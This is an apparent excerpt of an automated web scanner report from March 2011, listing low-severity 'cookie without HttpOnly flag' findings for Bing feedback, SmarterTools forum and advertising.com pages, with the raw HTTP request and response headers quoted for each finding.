The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /default.aspx?mkt=en-us&productkey=binglocal&brand=&&locale=en-us&P1=footerlivelocal&P4=LIVE&P2=http%3A%2F%2Fwww.bing.com%2Fmaps%2F%3Fv%3D2%26cp%3D42.35596934774129~-71.05408050119877%26lvl%3D15%26dir%3D0%26sty%3Dr%26where1%3D02110%252C%2520MA%26q%3D02110&P9=42.35596934774129/-71.05408050119877&searchtype=Local%20Search&backurl=http%3A%2F%2Fwww.bing.com%2Fmaps%2F%3Fv%3D2%26cp%3D42.35596934774129~-71.05408050119877%26lvl%3D15%26dir%3D0%26sty%3Dr%26where1%3D02110%252C%2520MA%26q%3D02110&scrx=1 HTTP/1.1
Host: feedback.discoverbing.com
Connection: keep-alive
Referer: https://feedback.discoverbing.com/default.aspx?mkt=en-us&productkey=binglocal&brand=&&locale=en-us&P1=footerlivelocal&P4=LIVE&P2=http%3A%2F%2Fwww.bing.com%2Fmaps%2F%3Fv%3D2%26cp%3D42.35596934774129~-71.05408050119877%26lvl%3D15%26dir%3D0%26sty%3Dr%26where1%3D02110%252C%2520MA%26q%3D02110&P9=42.35596934774129/-71.05408050119877&searchtype=Local%20Search&backurl=http%3A%2F%2Fwww.bing.com%2Fmaps%2F%3Fv%3D2%26cp%3D42.35596934774129~-71.05408050119877%26lvl%3D15%26dir%3D0%26sty%3Dr%26where1%3D02110%252C%2520MA%26q%3D02110
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: takemeback=takemeback=http%3a%2f%2fwww.bing.com%2fmaps%2f%3fv%3d2%26cp%3d42.35596934774129%7e-71.05408050119877%26lvl%3d15%26dir%3d0%26sty%3dr%26where1%3d02110%252C%2520MA%26q%3d02110; LNG=feedback.discoverbing.com=en-us; MSIDCookie=33f87e5c-7c8d-48b0-8858-d3cd02b35031

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 26 Mar 2011 01:00:06 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: takemeback=takemeback=http%3a%2f%2fwww.bing.com%2fmaps%2f%3fv%3d2%26cp%3d42.35596934774129%7e-71.05408050119877%26lvl%3d15%26dir%3d0%26sty%3dr%26where1%3d02110%252C%2520MA%26q%3d02110; expires=Sat, 26-Mar-2011 02:00:06 GMT; path=/
Set-Cookie: LNG=feedback.discoverbing.com=en-us; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: scrx=1; expires=Mon, 26-Mar-2012 01:00:06 GMT; path=/
Vary: Accept-Encoding
Content-Length: 26967

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en-us" xml:lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><hea
...[SNIP]...
15.141. http://forums.smartertools.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.smartertools.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: forums.smartertools.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: siteuidut=1dad4e31be764ea7b431d43fbac2942b; __utmz=134836083.1300551915.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=85202318.1300554584.2.2.utmcsr=help.smartertools.com|utmccn=(referral)|utmcmd=referral|utmcct=/SmarterMail/v8/Topics/Default.aspx; __utma=134836083.1670938407.1300551915.1300551915.1300554519.2; CommunityServer-UserCookie2570=lv=Sat, 19 Mar 2011 10:55:06 GMT&mra=Mon, 21 Mar 2011 12:41:16 GMT; __utma=85202318.1655160661.1300151775.1300557324.1300736103.4

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.1.31113.47
Set-Cookie: CommunityServer-UserCookie2570=lv=Mon, 21 Mar 2011 12:41:16 GMT&mra=Sat, 26 Mar 2011 09:43:07 GMT; expires=Sun, 25-Mar-2012 16:43:07 GMT; path=/
Set-Cookie: CSAnonymous=144f9286-e92e-4b17-84c2-481ab0762dbb; expires=Sat, 26-Mar-2011 17:03:07 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 16:43:07 GMT
Content-Length: 33480


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
15.142. http://forums.smartertools.com/12.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.smartertools.com
Path:   /12.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /12.aspx HTTP/1.1
Host: forums.smartertools.com
Proxy-Connection: keep-alive
Referer: http://forums.smartertools.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: siteuidut=1dad4e31be764ea7b431d43fbac2942b; __utmz=134836083.1300551915.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=85202318.1300554584.2.2.utmcsr=help.smartertools.com|utmccn=(referral)|utmcmd=referral|utmcct=/SmarterMail/v8/Topics/Default.aspx; __utma=134836083.1670938407.1300551915.1300551915.1300554519.2; CommunityServer-LastVisitUpdated-2570=; CSAnonymous=144f9286-e92e-4b17-84c2-481ab0762dbb; CommunityServer-UserCookie2570=lv=Mon, 21 Mar 2011 12:41:16 GMT&mra=Sat, 26 Mar 2011 09:43:07 GMT; __utma=85202318.1655160661.1300151775.1300736103.1301157836.5; __utmc=85202318; __utmb=85202318.1.10.1301157836

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.1.31113.47
Set-Cookie: CommunityServer-UserCookie2570=lv=Mon, 21 Mar 2011 12:41:16 GMT&mra=Sat, 26 Mar 2011 09:43:12 GMT; expires=Sun, 25-Mar-2012 16:43:12 GMT; path=/
Set-Cookie: CSAnonymous=144f9286-e92e-4b17-84c2-481ab0762dbb; expires=Sat, 26-Mar-2011 17:03:12 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 16:43:11 GMT
Content-Length: 57777


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
15.143. http://forums.smartertools.com/AddPost.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.smartertools.com
Path:   /AddPost.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AddPost.aspx?ReplyToPostID=94084&Quote=False HTTP/1.1
Host: forums.smartertools.com
Proxy-Connection: keep-alive
Referer: http://forums.smartertools.com/t/33244.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: siteuidut=1dad4e31be764ea7b431d43fbac2942b; __utmz=134836083.1300551915.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=85202318.1300554584.2.2.utmcsr=help.smartertools.com|utmccn=(referral)|utmcmd=referral|utmcct=/SmarterMail/v8/Topics/Default.aspx; __utma=134836083.1670938407.1300551915.1300551915.1300554519.2; CommunityServer-LastVisitUpdated-2570=; CSAnonymous=144f9286-e92e-4b17-84c2-481ab0762dbb; CommunityServer-UserCookie2570=lv=Mon, 21 Mar 2011 12:41:16 GMT&mra=Sat, 26 Mar 2011 09:44:30 GMT; __utma=85202318.1655160661.1300151775.1300736103.1301157836.5; __utmc=85202318; __utmb=85202318.5.10.1301157836

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 210
Content-Type: text/html; charset=utf-8
Expires: -1
Location: /login.aspx?ReturnUrl=%2fAddPost.aspx%3fReplyToPostID%3d94084%26Quote%3dFalse
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.1.31113.47
Set-Cookie: CommunityServer-UserCookie2570=lv=Mon, 21 Mar 2011 12:41:16 GMT&mra=Sat, 26 Mar 2011 09:45:07 GMT; expires=Sun, 25-Mar-2012 16:45:07 GMT; path=/
Set-Cookie: CSAnonymous=144f9286-e92e-4b17-84c2-481ab0762dbb; expires=Sat, 26-Mar-2011 17:05:07 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 16:45:07 GMT

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2flogin.aspx%3fReturnUrl%3d%252fAddPost.aspx%253fReplyToPostID%253d94084%2526Quote%253dFalse">here</a>.</h2>
</body
...[SNIP]...
15.144. http://forums.smartertools.com/cssearch/SearchResults.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.smartertools.com
Path:   /cssearch/SearchResults.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cssearch/SearchResults.aspx?u=137549&o=DateDescending HTTP/1.1
Host: forums.smartertools.com
Proxy-Connection: keep-alive
Referer: http://forums.smartertools.com/t/33244.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: siteuidut=1dad4e31be764ea7b431d43fbac2942b; __utmz=134836083.1300551915.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=85202318.1300554584.2.2.utmcsr=help.smartertools.com|utmccn=(referral)|utmcmd=referral|utmcct=/SmarterMail/v8/Topics/Default.aspx; __utma=134836083.1670938407.1300551915.1300551915.1300554519.2; CommunityServer-LastVisitUpdated-2570=; CommunityServer-UserCookie2570=lv=Mon, 21 Mar 2011 12:41:16 GMT&mra=Sat, 26 Mar 2011 09:45:12 GMT; CSAnonymous=144f9286-e92e-4b17-84c2-481ab0762dbb; __utma=85202318.1655160661.1300151775.1300736103.1301157836.5; __utmc=85202318; __utmb=85202318.6.10.1301157836

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.1.31113.47
Set-Cookie: CommunityServer-UserCookie2570=lv=Mon, 21 Mar 2011 12:41:16 GMT&mra=Sat, 26 Mar 2011 09:45:39 GMT; expires=Sun, 25-Mar-2012 16:45:39 GMT; path=/
Set-Cookie: CSAnonymous=144f9286-e92e-4b17-84c2-481ab0762dbb; expires=Sat, 26-Mar-2011 17:05:39 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 16:45:38 GMT
Content-Length: 34535


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
15.145. http://forums.smartertools.com/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.smartertools.com
Path:   /login.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.aspx?ReturnUrl=%2fAddPost.aspx%3fReplyToPostID%3d94084%26Quote%3dFalse HTTP/1.1
Host: forums.smartertools.com
Proxy-Connection: keep-alive
Referer: http://forums.smartertools.com/t/33244.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: siteuidut=1dad4e31be764ea7b431d43fbac2942b; __utmz=134836083.1300551915.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=85202318.1300554584.2.2.utmcsr=help.smartertools.com|utmccn=(referral)|utmcmd=referral|utmcct=/SmarterMail/v8/Topics/Default.aspx; __utma=134836083.1670938407.1300551915.1300551915.1300554519.2; CommunityServer-LastVisitUpdated-2570=; __utma=85202318.1655160661.1300151775.1300736103.1301157836.5; __utmc=85202318; __utmb=85202318.5.10.1301157836; CommunityServer-UserCookie2570=lv=Mon, 21 Mar 2011 12:41:16 GMT&mra=Sat, 26 Mar 2011 09:45:07 GMT; CSAnonymous=144f9286-e92e-4b17-84c2-481ab0762dbb

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.1.31113.47
Set-Cookie: CommunityServer-UserCookie2570=lv=Mon, 21 Mar 2011 12:41:16 GMT&mra=Sat, 26 Mar 2011 09:45:08 GMT; expires=Sun, 25-Mar-2012 16:45:08 GMT; path=/
Set-Cookie: CSAnonymous=144f9286-e92e-4b17-84c2-481ab0762dbb; expires=Sat, 26-Mar-2011 17:05:08 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 16:45:08 GMT
Content-Length: 11933


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
15.146. http://forums.smartertools.com/members/Chromebuster.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.smartertools.com
Path:   /members/Chromebuster.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/Chromebuster.aspx HTTP/1.1
Host: forums.smartertools.com
Proxy-Connection: keep-alive
Referer: http://forums.smartertools.com/cssearch/SearchResults.aspx?u=137549&o=DateDescending
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: siteuidut=1dad4e31be764ea7b431d43fbac2942b; __utmz=134836083.1300551915.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=85202318.1300554584.2.2.utmcsr=help.smartertools.com|utmccn=(referral)|utmcmd=referral|utmcct=/SmarterMail/v8/Topics/Default.aspx; __utma=134836083.1670938407.1300551915.1300551915.1300554519.2; CommunityServer-LastVisitUpdated-2570=; __utma=85202318.1655160661.1300151775.1300736103.1301157836.5; __utmc=85202318; __utmb=85202318.6.10.1301157836; CSAnonymous=144f9286-e92e-4b17-84c2-481ab0762dbb; CommunityServer-UserCookie2570=lv=Mon, 21 Mar 2011 12:41:16 GMT&mra=Sat, 26 Mar 2011 09:45:39 GMT

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 179
Content-Type: text/html; charset=utf-8
Expires: -1
Location: /login.aspx?ReturnUrl=%2fmembers%2fChromebuster.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.1.31113.47
Set-Cookie: CommunityServer-UserCookie2570=lv=Mon, 21 Mar 2011 12:41:16 GMT&mra=Sat, 26 Mar 2011 09:45:42 GMT; expires=Sun, 25-Mar-2012 16:45:42 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 16:45:42 GMT

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2flogin.aspx%3fReturnUrl%3d%252fmembers%252fChromebuster.aspx">here</a>.</h2>
</body></html>
15.147. http://forums.smartertools.com/t/33244.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.smartertools.com
Path:   /t/33244.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /t/33244.aspx HTTP/1.1
Host: forums.smartertools.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: siteuidut=1dad4e31be764ea7b431d43fbac2942b; __utmz=134836083.1300551915.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=85202318.1300554584.2.2.utmcsr=help.smartertools.com|utmccn=(referral)|utmcmd=referral|utmcct=/SmarterMail/v8/Topics/Default.aspx; __utma=134836083.1670938407.1300551915.1300551915.1300554519.2; CommunityServer-LastVisitUpdated-2570=; CSAnonymous=144f9286-e92e-4b17-84c2-481ab0762dbb; CommunityServer-UserCookie2570=lv=Mon, 21 Mar 2011 12:41:16 GMT&mra=Sat, 26 Mar 2011 09:44:19 GMT; __utma=85202318.1655160661.1300151775.1300736103.1301157836.5; __utmc=85202318; __utmb=85202318.4.10.1301157836

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.1.31113.47
Set-Cookie: CommunityServer-UserCookie2570=lv=Mon, 21 Mar 2011 12:41:16 GMT&mra=Sat, 26 Mar 2011 09:44:30 GMT; expires=Sun, 25-Mar-2012 16:44:30 GMT; path=/
Set-Cookie: CSAnonymous=144f9286-e92e-4b17-84c2-481ab0762dbb; expires=Sat, 26-Mar-2011 17:04:30 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 16:44:29 GMT
Content-Length: 20421


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
15.148. http://forums.smartertools.com/t/33246.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.smartertools.com
Path:   /t/33246.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /t/33246.aspx HTTP/1.1
Host: forums.smartertools.com
Proxy-Connection: keep-alive
Referer: http://forums.smartertools.com/12.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: siteuidut=1dad4e31be764ea7b431d43fbac2942b; __utmz=134836083.1300551915.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=85202318.1300554584.2.2.utmcsr=help.smartertools.com|utmccn=(referral)|utmcmd=referral|utmcct=/SmarterMail/v8/Topics/Default.aspx; __utma=134836083.1670938407.1300551915.1300551915.1300554519.2; CommunityServer-LastVisitUpdated-2570=; CSAnonymous=144f9286-e92e-4b17-84c2-481ab0762dbb; CommunityServer-UserCookie2570=lv=Mon, 21 Mar 2011 12:41:16 GMT&mra=Sat, 26 Mar 2011 09:43:12 GMT; __utma=85202318.1655160661.1300151775.1300736103.1301157836.5; __utmc=85202318; __utmb=85202318.2.10.1301157836

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.1.31113.47
Set-Cookie: CommunityServer-UserCookie2570=lv=Mon, 21 Mar 2011 12:41:16 GMT&mra=Sat, 26 Mar 2011 09:43:16 GMT; expires=Sun, 25-Mar-2012 16:43:17 GMT; path=/
Set-Cookie: CSAnonymous=144f9286-e92e-4b17-84c2-481ab0762dbb; expires=Sat, 26-Mar-2011 17:03:17 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 16:43:17 GMT
Content-Length: 21107


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
15.149. http://forums.smartertools.com/themes/leanandgreen/style/DynamicStyle.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.smartertools.com
Path:   /themes/leanandgreen/style/DynamicStyle.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/leanandgreen/style/DynamicStyle.aspx HTTP/1.1
Host: forums.smartertools.com
Proxy-Connection: keep-alive
Referer: http://forums.smartertools.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: siteuidut=1dad4e31be764ea7b431d43fbac2942b; __utmz=134836083.1300551915.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=85202318.1300554584.2.2.utmcsr=help.smartertools.com|utmccn=(referral)|utmcmd=referral|utmcct=/SmarterMail/v8/Topics/Default.aspx; __utma=134836083.1670938407.1300551915.1300551915.1300554519.2; __utma=85202318.1655160661.1300151775.1300557324.1300736103.4; CommunityServer-LastVisitUpdated-2570=; CommunityServer-UserCookie2570=lv=Mon, 21 Mar 2011 12:41:16 GMT&mra=Sat, 26 Mar 2011 09:43:05 GMT; CSAnonymous=144f9286-e92e-4b17-84c2-481ab0762dbb

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/css; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.1.31113.47
Set-Cookie: CommunityServer-UserCookie2570=lv=Mon, 21 Mar 2011 12:41:16 GMT&mra=Sat, 26 Mar 2011 09:43:07 GMT; expires=Sun, 25-Mar-2012 16:43:07 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 16:43:07 GMT
Content-Length: 4932


body, html
{
background-color: #606060;
background-image: none;
}

body, html, .CommonContent
{
font-family: Tahoma, Arial, Helvetica;
color: #000000;
}

A:LINK, .Commo
...[SNIP]...
15.150. http://leadback.advertising.com/adcedge/lb  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&betr=tc=1,99999,61674,60739,60489,60740,60490,56262,56511,61576,60493,50963,60491,60515,60514,52614,53656,52842,56830,52615,60546,56918,60500,56920,56555,56988,51133,54173,56780,56768,56500,52611,54463,56969,56835,54938,61166&guidm=1:16lsqii1n1a3cr&bnum=9145 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://cdn.at.atwola.com/_media/uac/tcode3.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=er080012979743200010; aceRTB=rm%3DThu%2C%2021%20Apr%202011%2022%3A04%3A42%20GMT%7Cam%3DThu%2C%2021%20Apr%202011%2022%3A04%3A42%20GMT%7Cdc%3DThu%2C%2021%20Apr%202011%2022%3A04%3A42%20GMT%7Can%3DThu%2C%2021%20Apr%202011%2022%3A04%3A42%20GMT%7Crub%3DMon%2C%2018%20Apr%202011%2013%3A48%3A43%20GMT%7C; C2=0B4iNZK9EYVVGzEBaVlxMJpwIg02FAHCdbdBwhQshXAcIgZ4FAHCkFeBwhgihXAcIgimGAHCBGeBwhQmhXAcI8eDGAHCjGeBwhAghXAcI8a4FAHCYimBwhw/VYAcIYyoGAHCdDmBwhgkhXAcI8Z4FAHCPGeBwhgQvaAcIERoGAnrrcgj/Z04wmLCMKpBDhpDBEzIG52AMlfh2SwR2XAOy2ZAFFqRpCbJDcYjGHmpIQQ6/YQlwu7ATKpBT0adDoXdGHmrMNwPAaguwK/AqNpBw0qfh0xqGNzsdfgWqao7s6oBK+mhn4a+GM5iGNDpucgG2Y8Ql5QiGvHA3jqxLPrZIMKpGAnp/dQ/SZklyO+BGKqBsL7YHwAoGwugicQvJVo7RGACg2cxnZm5IaAqhyLCnriBw1I9IsfzFAH; GUID=MTMwMDk4ODAyMDsxOjE2bHNxaWkxbjFhM2NyOjM2NQ; F1=BgKgL2kAAAAAmc1CAIAAgEgAAAAABK6CAEAAgEABAAAABAAAAYAA4CA; BASE=gKQklmhpjJjpy24mVRcoq4SdsN4DbAQwMFaeqnfwaxhNqD6gryqB6EvxQXY2KV5lL8PiUafUl/jd3CaTb8zQcHMAUV3HWkGbQWfZDNNgjsbfnuO9nV0Nlc61bCpIG8T/su4h8sC0carEnP1KoTJVPzXGhkVlOjx42bzuO8yI3jmN9RQwSzfIwqUqLkoHV94DQtJod/9cIfMmhhUJYd3tXzd8Z082dFw7MdgLZn1KZfSHVvoue6zRhz10Luq2igh0XjoKRJJY7HOYMCVqqqFkTQH!; ROLL=AfAiY6N8IPcM+MCL+oJpPm/nM2ZWyBkHnus73S4ba05NBKaaI40fTiE!

Response

HTTP/1.1 200 OK
Connection: close
